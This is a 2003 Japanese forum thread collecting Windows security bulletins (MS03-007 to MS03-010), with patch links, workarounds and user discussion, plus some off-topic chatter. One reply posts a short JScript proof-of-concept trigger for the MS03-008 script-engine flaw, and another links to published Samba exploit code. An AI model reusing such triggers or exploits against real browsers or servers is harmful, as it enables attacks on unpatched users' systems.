【Windows】セキュリティ情報総合スレッド 2

■Windows2000/IIS 5.0に「緊急」のセキュリティホール

Windows コンポーネントの未チェックのバッファにより
Webサーバーが侵害される（MS03-007）

登録日 ：2003/03/18
更新日 ：2003/03/18

概要 ：
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) 2000 をご使用のシステム管理者
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 :
管理者は、直ちにこの修正プログラムをインストールしてください。

影響を受けるソフトウェア :
・Microsoft Windows 2000

>>222 続き

問題 ：
技術的な説明 :
Microsoft Windows 2000 は、World Wide Web (WWW) における分散オーサリング
およびバージョン管理 (WebDAV: World Wide Web Distributed Authoring and
Versioning) プロトコルをサポートしています。 RFC 2518で定義されている
WebDAV はインターネット上でコンピュータの間のファイル管理と編集機能の
標準を提供するハイパーテキスト転送プロトコル (HTTP) の拡張機能です。
セキュリティの脆弱性は、WebDAV が使用する Windows コンポーネントに存在
する未チェックのバッファが原因です。

攻撃者により、Internet Information Server (IIS) が動作するサーバーに
対して、特殊な HTTP 要求を送信されることで脆弱性が悪用されます。この特殊
な要求により、サーバーを停止または攻撃者が指定した操作を行うことが可能で
す。この操作は、IIS の実行ユーザーの権限 (既定では、LocalSystem) で
行われます。

マイクロソフトは、この脆弱性のセキュリティ修正プログラムを提供しており、
可能な限り早く適用することを推奨いたします。修正プログラムの影響を確認
する間の、一時的な回避策と追加のツールも合わせて公開しました。一時的な
回避策とツールについては、よく寄せられる質問の [回避策] のセクションで
説明しています。

問題を緩和する要素 :
・IIS Lockdown Wizard tool と共に提供される URLScan が既定の設定で使用
されている場合、この脆弱性を悪用する攻撃を防ぐことができます。
・この脆弱性が悪用されるのは、攻撃者が影響を受けるサーバーと Web
セッションを確立できる場合のみです。

>>223 続き

深刻度 :
Windows 2000 緊急
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。

脆弱性識別番号 : CAN-2003-0109

テストしたバージョン :
マイクロソフトは Windows NT 4.0、Windows 2000 および Windows XP のテスト
を行い、この脆弱性による影響を評価しました。それ以前のバージョンに関して
はサポートの対象となっていないため、この脆弱性による影響は不明です。

修正プログラム ：
Microsoft Windows 2000:
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。

・すべての言語 (NEC PC-9800 シリーズを除く)
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=ja

・NEC PC-9800 シリーズ
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyID=fbcf9847-d3d6-4493-8dcf-9ba29263c49f&DisplayLang=ja

(WU)このマークの付いている修正プログラムは Windows Update から
インストールすることもできます。

>>224 続き

修正プログラムに関する追加情報 :
対象プラットフォーム :
この修正プログラムは、Windows 2000 Service Pack 2 または Service Pack 3
を実行しているシステムにインストールすることができます。

この修正を含む予定のサービス パック :
この問題に対する修正プログラムは Windows 2000 Service Pack 4 に含まれる
予定です。

再起動の必要性 : あり
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 :
・この修正プログラムがマシンにインストールされたことを確認するためには、
マシンに次のレジストリ キーが作成されたことを確認して下さい。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q815021

各ファイルを確認するためには、次のレジストリ キーで、日付、時間そして
バージョン情報を参照して下さい。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q815021\Filelist

2か？

>>222-225 に関して、MSDN周りからも情報が来てますので掲載します。

◇[マイクロソフト セキュリティ情報]━━━━━━━━━━━━━━━━━━
＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊
Windows 2000 にて Internet Information Services 5.0 をお使いのお客様へ
＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊
マイクロソフト製品をご利用になっているお客様へセキュリティに関する重要な
お知らせです。

■「MS03-007 : Windows コンポーネントの未チェックのバッファにより Web
サーバーが侵害される」という問題に関して、マイクロソフトはセキュリティ修正
プログラムの提供を開始しました。本セキュリティ上の脆弱性は、Internet
Information Services 5.0 に含まれる Web DAV 機能に対して、不正な要求
データを送る事により発生する事が確認されております。弊社では、本脆弱性への
対処を行うセキュリティ修正プログラム及び、回避が可能となるセキュリティツー
ルの開発を行いました。また、これらに対する詳細な日本語資料を作成し、弊社
Web サイトにて公開を開始しております。ぜひご確認いただき、適切な対処を行
ってくださいますよう、お願いいたします。

今回公開しましたセキュリティ修正プログラムは、Windows 2000 Service Pack 2
以降の環境に適用を行うことが可能です。お客様の環境におきまして Service
Pack 2 以降を適用されていない場合、可能な限り Service Pack 3 を適用した後
に、当修正プロラムを適用いただきますようお願いいたします。
○詳しくは、下記のサイトで提供している情報をご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp

■マイクロソフト セキュリティ情報 (MS03-007) ： よく寄せられる質問
マイクロソフトは、可能な限り早くセキュリティ修正プログラムを適用すること
を強く推奨いたしますが、適用までの間この脆弱性を悪用するための WebDAV の
要求を防ぐためのいくつかのの回避策があります。合わせて、マイクロソフトは
容易にこれらの回避策を実施するためのツールとドキュメントを提供しています。
http://www.microsoft.com/japan/technet/security/bulletin/fq03-007.asp

あまり同じネタでスレを消費したくはないのですが、
MS03-007の脆弱性に関して、すでにこの脆弱性を利用した攻撃が行われているため、
関係者は早急な対処が必要です。patchをテストしている間、脆弱性を回避する方法も
提供されています。patchはWindows Updateから現在の所、入手することは出来ません
(指定URLからダウンロード)。事態は急を要しているため、すでにCERT/CC、JPCERT/CC、
警察庁などからもすでに情報が出てます。ご注意下さい。

セキュリティホールmemo :
■ Windows コンポーネントの未チェックのバッファにより Web サーバーが侵害される (MS03-007)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/03.html#20030318_ms03-007
CERT Advisory CA-2003-09 Buffer Overflow in Microsoft IIS 5.0
http://www.cert.org/advisories/CA-2003-09.html
LAC 邦訳版: http://www.lac.co.jp/security/intelligence/CERT/CA-2003_09.html
JPCERT/CC Alert 2003-03-18 Microsoft IIS 5.0 の脆弱性に関する注意喚起
http://www.jpcert.or.jp/at/2003/at030003.txt
警察庁：マイクロソフト社Windows2000上で動作するInternet Information Server (IIS) 5.0の脆弱性について
http://www.cyberpolice.go.jp/important/20030318_155635.html
ZDNN Windows 2000に「被害報告あり」のセキュリティホール
http://www.zdnet.co.jp/news/0303/18/ne00_win2000.html

http://internet.watch.impress.co.jp/www/article/2003/0318/grouch.htm

5月9日にハードディスクを破壊するウイルス「GROUCH」

トレンドマイクロ株式会社は、5月9日にハードディスクを破壊するVBScript型
ウイルス「VBS_GROUCH.A」を警告した。危険度は「低」だが、破壊力と感染力は
「高」になっている。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_GROUCH.A

>>302
同意
小泉はおかれている立場（>>299)がしょうがないとして、
ブッシュがおかしすぎるんだよな。

誤爆スマソ

>>222-225の「重要な」追加情報です。必ずこのレスだけではなくURLリンク先も参照してください。
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
----------------------------------------------------------------
Windows コンポーネントの未チェックのバッファにより Web サーバーが侵害される (MS03-007)
(略)

警告 :
Windows 2000 Service Pack 2 を実行している場合、この更新をインストール
する前にシステムの ntoskrnl.exe のバージョンをチェックして下さい。
システムの ntoskrnl.exe のバージョンを確認するためには、次のステップを
行って下さい。

1. %windir%\system32 ディレクトリを参照します。
2. ntoskrnl.exe を右クリックします。
3. [プロパティ] をクリックします。
バージョン情報は [バージョン] タブに表示されています。

5.0.2195.4797 から 5.0.2195.4928 (5.0.2195.4928 を含む) までの
ntoskrnl.exe のバージョンはこの修正プログラムとの互換性がありません。
これらのバージョンはプロダクト サポート サービスの修正プログラムのみで
配布されたバージョンです。（Windows Update やマイクロソフトの Web サイト
からダウンロード可能な修正プログラムではありません。）

この問題に対する修正プログラムが、ntoskrnl.exe のこれらのいずれかの
バージョンが存在するシステムにインストールされる場合、最初の再起動に
コンピュータでエラーが発生し、Stop 0x00000071 メッセージが表示されます。
このため、Windows 2000 回復コンソールを使用して
“\winnt\$NTUninstallQ815021$” ディレクトリに保存されている ntdll.dll
のバックアップ コピーを回復する必要があります。

プロダクト サポート サービスから配布された ntoskrnl.exe のバージョンが
存在するシステムを更新するためには、この修正プログラムを適用する前に
プロダクト サポート サービスにご連絡ください。プロダクト サポート
サービスへの連絡に関する情報は次の Web サイトをご覧下さい。
http://support.microsoft.com

または、この問題に対する修正プログラムをインストールする前に、Service
Pack 3 にアップグレードすることもできます。

http://headlines.yahoo.co.jp/hl?a=20030320-00000001-zdn-sci

詳細キボンヌ

MS03-008のｻﾝﾌﾟﾙｺｰﾄﾞｷﾎﾞﾝﾇ

>>236
http://www.securiteam.com/

>>235
同じくきぼんぬ

★すべてのユーザーはWindows Updateの実施を★

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/1/

>>237
ｱﾘｶﾞﾄ。でもそこで見つからなかったのでｶｷｺした次第でつ。

遅れて申し訳ありません。MS03-008及びMS03-009に関する情報です。

----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-008.asp
----------------------------------------------------------------
Windows スクリプト エンジンの問題により、コードが実行される (814078) (MS03-008)

登録日 : 2003/3/20　更新日 : 2003/3/20
概要 :
このセキュリティ情報の対象となるユーザー : Microsoft Windows をご使用のお客様
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様は、直ちにこの修正プログラムをインストールしてください。
影響を受けるソフトウェア :
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Me
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP

問題 :
技術的な説明 :
Windows スクリプト エンジンは、Windows オペレーティング システムでスクリプト
コードを実行する機能を提供します。スクリプト コードは、Web ページに機能を追加
したり、オペレーティング システムまたはプログラム内でタスクを自動化するために
使用することができます。このコードは、Visual Basic スクリプト （英語情報）、
または JScript （英語情報） など、いくつかの異なるスクリプト言語の形式で記述
することができます。
JScript (英語情報) 用の Windows スクリプト エンジンが、情報を処理する方法に問題
が存在します。攻撃者がこの脆弱性を悪用し、Web ページを作成し、ユーザーが訪問した
際に、ユーザーの権限で攻撃者の任意のコードが実行される可能性があります。そのような
Web ページは Web サイトにホストされるか、または電子メールにて直接ユーザーに送信
される可能性があります。
マイクロソフトは、この脆弱性に対する修正プログラムを提供し、影響を受けるすべての
お客様にその修正プログラムを直ちに適用するように推奨いたします。お客様がその修正
プログラムの影響と互換性のテストを行う際に、この脆弱性が悪用されるのを防ぐために
使用可能な別の予防手段を確認しました。これらの一時的な回避策は、「よく寄せられる
質問」の「回避策」の欄で説明しています。

問題を緩和する要素 :
攻撃者が攻撃を実行するには、ユーザーが攻撃者の運営する Web サイトを訪問するか、
または攻撃者から送信された HTML 形式の電子メールを受信することが必要条件となります。
Internet Explorer でアクティブ スクリプトを無効に設定したコンピュータには、
この問題の影響はありません。
攻撃者がこの脆弱性を悪用した場合、ユーザーと同じ権限のみが与えられます。システム
上で低い権限を設定されたアカウントを持つユーザーは、管理者権限で実行している
アカウントを持つユーザーよりも危険性は低いと言えます。
この脆弱性を悪用した、HTML 形式の電子メールによる自動化された攻撃は、
Outlook Express 6 または Outlook 2002 を既定の構成で使用するか、または Outlook
電子メール セキュリティ アップデートをインストールした Outlook 98 または 2000 を
使用することによって阻止することができます。

深刻度 : 上記の対象となる全てのバージョンにおいて緊急
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な展開形式
およびこの脆弱性がシステムに及ぼす影響に基づいています。
脆弱性識別番号 : CAN-2003-0010

テストしたバージョン :
マイクロソフトは Windows 98、Windows 98 Second Edition、Windows Me、Windows NT 4.0、
Windows NT 4.0 Terminal Server Edition、Windows 2000、Windows XP のテストを行い、
この脆弱性による影響を評価しました。それ以前のバージョンに関してはサポートの対象
となっていないため、この脆弱性による影響は不明です。

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
すべての Windows システム用の修正プログラムは、Windows Update にてダウンロード
することができます。また、以下の修正プログラムを介して、手動で適用することが
できます。また、これらの修正プログラムは、手動でインストールするためにダウン
ロードすることもできます。
Windows 98 および Windows 98 SE:
http://www.microsoft.com/downloads/details.aspx?FamilyID=c6504fd9-5e2c-45bf-9424-55d7c5d2221b&DisplayLang=ja
Windows Me:
http://download.microsoft.com/download/7/7/3/7739a3af-83f7-42f2-85b4-f512bf90d5b9/js56mjp.exe
Windows NT 4.0:
http://www.microsoft.com/downloads/details.aspx?FamilyID=c6504fd9-5e2c-45bf-9424-55d7c5d2221b&DisplayLang=ja
Windows NT 4.0, Terminal Server Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyID=c6504fd9-5e2c-45bf-9424-55d7c5d2221b&DisplayLang=ja
Windows 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyID=824b1bd4-b4d6-49d5-8c58-199bdc731b64&DisplayLang=ja
Windows XP Home Edition および Professional Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyID=824b1bd4-b4d6-49d5-8c58-199bdc731b64&DisplayLang=ja

修正プログラムに関する追加情報 :
対象プラットフォーム :
Windows 98 用の修正プログラムは Window 98 を実行しているシステムにインストールすることができます。
Windows 98SE 用の修正プログラムは Window 98SE を実行しているシステムにインストールすることができます。
Windows Me 用の修正プログラムは Window Me を実行しているシステムにインストールすることができます。
Windows NT 4.0 用の修正プログラムは Windows NT 4.0 Service Pack 6a を実行している
システムにインストールすることができます。
Windows NT 4.0 Terminal Server Edition 用の修正プログラムは Windows NT 4.0
Terminal Server Edition Service Pack 6 を実行しているシステムにインストール
することができます。
Windows 2000 用の修正プログラムは、Service Pack 2、または Service Pack 3 を
実行しているシステムにインストールすることができます。
Windows XP 用の修正プログラムは Window XP または Windows XP Service Pack 1 を
実行しているシステムにインストールすることができます。

この修正を含む予定のサービス パック : (略)
再起動の必要性 : あり
修正プログラムのアンインストール : 不可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)
警告 : なし

詳細情報 :
よく寄せられる質問 ： マイクロソフトセキュリティ情報（MS03-008）
http://www.microsoft.com/japan/technet/security/bulletin/fq03-008.asp
US マイクロソフトセキュリティ情報（MS03-008）
http://www.microsoft.com/technet/security/bulletin/ms03-008.asp
この脆弱性に対するサポート技術情報 （KB） は現在準備中です。
更新履歴 :　2003/3/20: このセキュリティ情報ページを公開しました。

----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-009.asp
----------------------------------------------------------------
ISA Server DNS アタック検出フィルタの問題により、サービス拒否が起こる
(331065) (MS03-009)

登録日 : 2003/3/20　更新日 : 2003/3/20
概要 :　このセキュリティ情報の対象となるユーザー :
Microsoft(R) Internet Security and Acceleration (ISA) Server 2000 を
実行しているシステム管理者
脆弱性の影響 : サービス拒否
最大深刻度 : 警告
推奨する対応策 :
システム管理者は修正プログラムのインストールを検討して下さい。
影響を受けるソフトウェア :
・Microsoft ISA Server
(Microsoft Back Office Server 2000、Microsoft Small Business Server にも
含まれています)

問題 :　技術的な説明 :
Microsoft Internet Security and Acceleration (ISA) Server 2000 には着信
方向のトラフィックにアプリケーション フィルタを適用する機能があります。
アプリケーション フィルタにより、ISA Server は特定のアプリケーションに
ついて、データ ストリームを分析し、データがファイアウォールを通過する
時のデータの検査、スクリーニング、ブロック、リダイレクトまたは変更などの
アプリケーション特有の処理を提供することができます。このメカニズムは、
攻撃が試行されたことを示す無効な URL や内部のドメイン ネーム サービス
(DNS) サーバーへの攻撃に対する保護を行うために使用されます。
このフィルタには、サーバーに着信する DNS リクエストをスキャンする時、
フィルタが特定の種類のリクエストを適切に処理しない問題が存在します。
この脆弱性は、攻撃者により DNS サーバーを公開している ISA Server
コンピュータに対して不正なリクエストを送ることにより、悪用される可能性が
あります。この攻撃を受けた ISA Serverコンピュータでは、アプリケーション
フィルタ機能が正しく動作しなくなり、これにより DNS サーバーへの要求が
正しく処理されなくなるため、サービス拒否が発生する可能性があります。この
攻撃が行われても、不正な DNS リクエストは ISA Server 上の
ファイアウォールで止められ、内部の DNS サーバーに渡されません。また、
そのほかのすべての ISA Server 機能は影響を受けません。

問題を緩和する要素 : (略)
深刻度 :　ISA Server 警告
脆弱性識別番号 : CVE-CAN-2003-0011
テストしたバージョン : (略)
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトから
ダウンロードできます。
Microsoft ISA Server:
・日本語版 :
http://microsoft.com/downloads/details.aspx?FamilyId=F62127C5-51E3-4B34-A6D3-B9CF840358BD&displaylang=ja
・英語版 :
http://microsoft.com/downloads/details.aspx?FamilyId=F62127C5-51E3-4B34-A6D3-B9CF840358BD&displaylang=en
(その他の国は略)

修正プログラムに関する追加情報 :
対象プラットフォーム :
この修正プログラムは ISA Server 2000 Service Pack 1 または ISA Server
Feature Pack 1 を実行しているシステムに適用することができます。

この修正を含む予定のサービス パック :
この問題に対する修正プログラムは次の ISA Server 用のサービス パックに
含まれる予定です。
再起動の必要性 : なし
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)
警告 :　なし
他のセキュリティ修正プログラムの入手先 : (略)

詳細情報 :
・よく寄せられる質問 ： マイクロソフトセキュリティ情報（MS03-009）
http://www.microsoft.com/japan/technet/security/bulletin/fq03-009.asp
・US マイクロソフトセキュリティ情報（MS03-009）
http://www.microsoft.com/technet/security/bulletin/ms03-009.asp
謝辞 ：
この問題を連絡し、顧客の保護に協力して下さった Network Computing
Magazine の Mike Fratto 氏に対し、マイクロソフトは深い謝意を表します。
更新履歴 :　2003/3/20 : このセキュリティ情報ページを公開しました。

>>235

に対してどうすれば良いのか

>>152みたいのを作っていただけないでしょうか？ 厨ですみません。

■WinbiffV2.0〜V2.42にセキュリティホール、2.42PL2への更新を

Winbiffユーザーの皆様へ重要なお知らせ
http://www.orangesoft.co.jp/Winbiff20/secholl_20030317.html

>>252 自分のお使いのバージョンのWindowsに対する修正パッチのリンクが>>245
にありますから、ダウンロードして実行し再起動するだけですが・・・
お使いのWindowsのバージョンを調べるにはスタートメニューから
ファイル名を指定して実行をクリックし"winver"と入力します。

というか、普通にWindows Updateすれば出てくるはずなのですが・・・

>>253 Σ（；´Д｀）・・・


(´・ω・`)

不要な顔文字はやめておくれ

アップデートして再起動したらフリーズした

インターネットと印刷ができなくなったりしている

（ ´Д｀ ）　カネカエセ

>>255 もろ>>253の対象者だったもので・・・しかも結構重大そうで
信頼に傷が付いたモノですから・・・

>>256 Windows板の各質問スレへどうぞ

>>255
細かい事言うなよ(　´∀｀)

>>255
じゃあ今度から窓板住人さんに変わっておまえがここに書け。
それができないんならくだらんことで文句言うな。

>むむむさん、窓板住人さん
いつもありがとうございます。助かってます。

ちょうど、今、ハングアップしました・・・。
閉じても、閉じても、ヘルプが出てきて・・・仕方がないので再起動です。

>>255
自己責任
>>259
自己責任

>>240
これでどうだ!!!!!!!!!!!!!!!!!!!!!1
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0142.html
<script>
var trigger = [];
i = 1;
do {trigger[i] = 1;} while(i++ < 10000);
trigger[0x3FFFFFFF] = 1;
trigger.sort(new Function("return 1"));
</script>

「１」は「！」の間違い。

>>259
低脳だから文句に見えるんだね、腰ぎんちゃくクン♪

★★★★★★★★★★★★★

ここまで読んで対策済み

★★★★★★★★★★★★★

>>262は変なスクリプト貼り付けてるな。
テストしてみたらエラー出したし。

まぁJavaScriptであると仮定しても
一行目は
trigger = new Array();
だろうな。

Windows全バージョンに「緊急」の脆弱性
http://headlines.yahoo.co.jp/hl?a=20030320-00000001-zdn-sci

に、対するパッチがちゃんと当ててあるかどうか確認する方法ってないのでしょうか？

>>268
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-008.asp
修正プログラムが正しくインストールされたかどうか確認する方法 :
この修正プログラムが正しくインストールされたことを確認するためには、
以下のファイル欄に挙げられているファイルの日付/タイムスタンプを参照し、各ファイルを 確認して下さい。
JScript は Windows Script Engine に含まれる機能の一部で、それ単体で配布されています。
また、スクリプトテクノロジを使用するInternet Explorerのような製品にも同梱されています。
そのため、お客様の環境によって、現在使用されている JScript のバージョンを確認する必要があります。
上記の理由により、Windows Update により修正プログラムをインストールした場合は、JScript 5.5および
JScript 5.1が自動判別され、対応したバージョン の修正プログラムがインストールされます。
その際もセキュリティ対策上問題ございません。
また、お客様の環境にインストールされるファイルは、以下の表の中のひとつとなります。

日付 時刻 バージョン サイズ ファイル名

-----------------------------------------------------------------

2003/01/13 14:57 5.6.0.8513 589,881 Jscript.dll (JScript Version 5.6)

2003/01/13 18:53 5.5.0.8513 553,020 Jscript.dll (JScript Version 5.5)

2003/01/14 14:58 5.1.0.8513 487,481 Jscript.dll (JScript Version 5.1)

>>269

面倒だのぉ〜

[ロサンゼルス　２１日　ロイター］　
イラク戦のさなか、米映画芸術科学アカデミーは２１日のアカデミー賞授賞式を予定通り行った。

注目されたアカデミー賞長編アニメ部門では、ライバルの「千と千尋の神隠し」を押しのけて
「リロ＆スティッチ」が受賞。
アカデミーは、受賞の理由を、今ほど米国文化に敬意を払うのに大切な時は無いからとしている。

世界各地で広範な反戦デモを引き起こした米国のイラク攻撃の間、映画産業の祭典である授賞式を
どのように挙行するか、ハリウッドはここ１週間追い詰められていた。
http://pc.2ch.net/test/read.cgi/sec/1017309416/l30

>>269
さんくすです。
確認だけでも大変なんだな。。。

>>271
専用ブラウザ普及してるから無駄だべ。

ZDNN：MSのパッチでシステムがフリーズ
http://www.zdnet.co.jp/news/0303/21/nebt_16.html

あぼーん

まぁ、まったり行きましょう・・・

米国を中心としたWebサイトの改ざんについて
http://www.isskk.co.jp/support/techinfo/general/webcrack_analysis.html
米国のサイトを中心に数千件のWebサーバの改ざんが行なわれている模様です。
尚、米国以外のサイトにおいても、改ざん竄が行なわれていることから、日本の
サイトにおいても、十分な対策を行なう事が必要と思われます。
改ざんされたサイトは、Apache/1.3x + OpenSSL/0.96bを利用しているところが
非常に多いことがわかりました。また、Microsoft IIS についても、改ざんが
行なわれております。(抜粋・詳細は上記リンク先を参照してください)

[VulnWatch] New attack vectors and a vulnerability dissection of MS03-007
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0144.html

セキュリティホールmemoの文章をそのまま引用します
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/03.html#20030323_ms03-007-new
＃他に代わる文章が思いつかなかった
------
MS03-007 が示した弱点の攻撃手段は WebDAV だけではない、という指摘。
WebDAV を無効にした IIS 5.0 はもちろん、IIS 5.0 が存在しない場合ですら、
この弱点を利用した攻撃が可能だという。
全ての Windows 2000 に patch をインストールすべきだ、というのだ。

>>266-267
omoroi

とうとう日本でも WEB 改竄被害発生　イラン戦争関連 WEB 改竄

https://www.netsecurity.ne.jp/article/1/9238.html

==============================================================================
「iOffice」および「desknet's」にパスワードなしにログイン可能なセキュリティ欠陥
==============================================================================
http://memo.st.ryukoku.ac.jp/archive/200303.month/5672.html
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/03.html#20030324_iOffice
少なくとも、iOfficeV3 R1.3 および desknet's V1.0J R1.5 に弱点。認証機能が極めて
不十分であるため、誰でも任意のユーザになりすまし、iOfficeV3 / desknet's V1.0J の
全機能を利用することが可能となる。
desknet's V2.1J R1.2 で修正されているので、upgrade / 移行する。 iOfficeV3 から
desknet's V2 スタンダード版への移行は、2002年4月1日〜2004年3月末までは無償となっている。

（＾＾）脱MS宣言（＾＾）

www.yomiuri.co.jp/politics/news/20030324ia21.htm

McAfee ePolicy Orchestrator 2.5SP1エージェントの脆弱点
http://www.nai.com/japan/pqa/aMcAfeeEpo.asp?ancQno=EP03031901&ancProd=McAfeeEpo

もういい加減飽きてきたくらいのMS03-007 (>>222-225 >>233-234)に関する件ですが、

セキュリティホールmemoなどによると、Microsoftは、「これらのバージョンはプロダクト
サポート サービスの修正プログラムのみで配布されたバージョンです。（Windows Update
やマイクロソフトの Web サイトからダウンロード可能な修正プログラムではありません。） 」
と記述しているものの、実際にはMicrosoftのWebサイトからダウンロード可能な時期が
あったのではないかと言う指摘があります。どちらにせよ、SP3ではない場合は、ntoskrnl.exe
のバージョンをチェックした方が良さそうです。
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/03.html#20030325_MS03-007-kernel

http://homepage2.nifty.com/winfaq/w2k/w2knews.html#bugs

Windows 2000 のコアコンポーネントに重大なセキュリティホールが発覚。
当初 IIS 搭載システムに限定と発表されたが、すべての Windows 2000 が対象と変更された。
一部のシステムに修正プログラムを適用すると Windows が起動しなくなるため、Microsoft のセキュリティ情報 (MS03-007) を熟読の上、早期に適用を。

だそうな

ちなみに、昨日SP3をクリーン再インストールしてWinUpdateにアクセスしたら
ちゃんとこのパッチは当たってたので報告まで。

LovGateに亜種、txtファイルにワーム実行を関連付け
http://www.zdnet.co.jp/news/0303/26/njbt_06.html
トレンドマイクロは3月25日、2月に流行したワーム「LovGate」の亜種
「WORM_LOVGATE.G」が見つかったとして警告した。危険度は「低」と
しているが、国内で被害が確認されているため注意を呼び掛けている。

この書き込みの後、2、3日留守にしますので宜しくお願いします。
=====================================================
このニュースレターでは、セキュリティ情報をいち早くお知らせするために、
要約情報という形式でご案内いたします。
このセキュリティ情報の詳細につきましては、現在準備中です。
=====================================================
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-010ov.asp

MS03-010 に関する情報
「MS03-010: RPC エンドポイント マッパーの問題により、サービス拒否の
攻撃が実行される (331953)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記製品のリモート プロシージャ コール (RPC: Remote
Procedure Call) のエンドポイント マッパーに問題があり、サービス拒否の
攻撃を受ける可能性があります。その結果、悪意のあるユーザーにお客様の
コンピューター上のサービスを停止させられる可能性があります。

対象となる製品
==============
・Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP

修正プログラム
==============
・Microsoft Windows NT 4.0
Windows NT 4.0 および Windows NT 4.0 Terminal Server Edition は、
この脆弱性の影響を受けますが、Windows NT 4.0 のアーキテクチャ上の
制限により、この脆弱性を排除するために必要な変更を行う修正プログラムを
提供することができません。したがって、回避策による対応を
お願いいたします。詳細につきましては、下記「回避策」をご覧ください。

・Microsoft Windows 2000
PC/AT 互換機 (WU)
http://download.microsoft.com/download/4/f/9/4f9c4a7c-06c4-4e5f-8df1-13da4ee1a3b7/Q331953_W2K_SP4_X86_JA.exe
NEC PC-9800シリーズ (WU)
http://download.microsoft.com/download/6/e/5/6e5a2765-3e19-4e28-81ef-a6e08d2cbffd/Q331953_W2K_SP4_nec98_JA.exe
Windows 2000 SP2 または Windows 2000 SP3 の環境にインストールすることが
できます。

・Microsoft Windows XP
32 bit Edition (WU)
http://download.microsoft.com/download/9/e/1/9e117c69-10b1-4a2b-b73b-873cc807dfe9/Q331953_WXP_SP2_x86_JPN.exe
64 bit Edition (WU)
http://download.microsoft.com/download/a/b/d/abd28208-d8d1-4100-8260-0a8081f954ed/Q331953_WXP_SP2_ia64_JPN.exe
Windows XP または Windows XP SP1 の環境にインストールすることができます。

修正プログラムのダウンロード、または、インストール方法については次の
サイトを参照ください。(略)

省略した部分は>>288冒頭のURLで確認することが出来ます。
-----
回避策
======
Windows NT 4.0 環境のお客様は本回避策により、このセキュリティ情報で
報告される問題への対応が可能です。
ファイアウォールにてポート 135 をブロックする : ポート 135 は、RPC
エンドポイント マッパー サービスとの RPC 接続を開始するために
使用されます。ポート 135 をファイアウォールでブロックし、
ファイアウォールの背後のシステムにこの脆弱性が悪用される攻撃を
防ぐことができます。

詳細
====
この修正プログラムをインストールすることにより、悪意のある
ユーザーによる以下の攻撃を防ぐことができます。
<重要> RPC が不正なメッセージを適切に処理することができないために
サービス拒否の問題が発生します。
対策が行われていないシステムでは、この脆弱性を悪用した攻撃により、
リモート プロシージャ コールを使用する事ができなくなる被害を受ける
可能性があります。これらの攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーにより引き起こされる可能性があり、この脆弱性を
悪用されることにより、以下のような実害を受ける事が考えられます。
・RPC サービスが異常終了します。
・RPC サービスに依存するサービスが異常終了します。

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)
http://www.microsoft.com/technet/security/bulletin/MS03-010.asp

更新履歴　2003/03/27: この要約情報を公開しました。

またか

（−。−；）ふ〜〜〜〜〜

■RealPlayer、RealOne Playerにセキュリティ脆弱性〜アップデートで解決
http://internet.watch.impress.co.jp/www/article/2003/0331/real.htm

test

age

■SETI@homeに脆弱性
http://slashdot.jp/article.pl?sid=03/04/07/0742200&topic=65&mode=thread
http://slashdot.org/article.pl?sid=03/04/06/156217&tid=172
http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Seti@home

一応、Win版もあるということで。

■2.2.8a以前のSambaに脆弱性
http://www.digitaldefense.net/labs/advisories/DDI-1013.txt

Exploitコード公開済。
http://www.digitaldefense.net/labs/securitytools.html

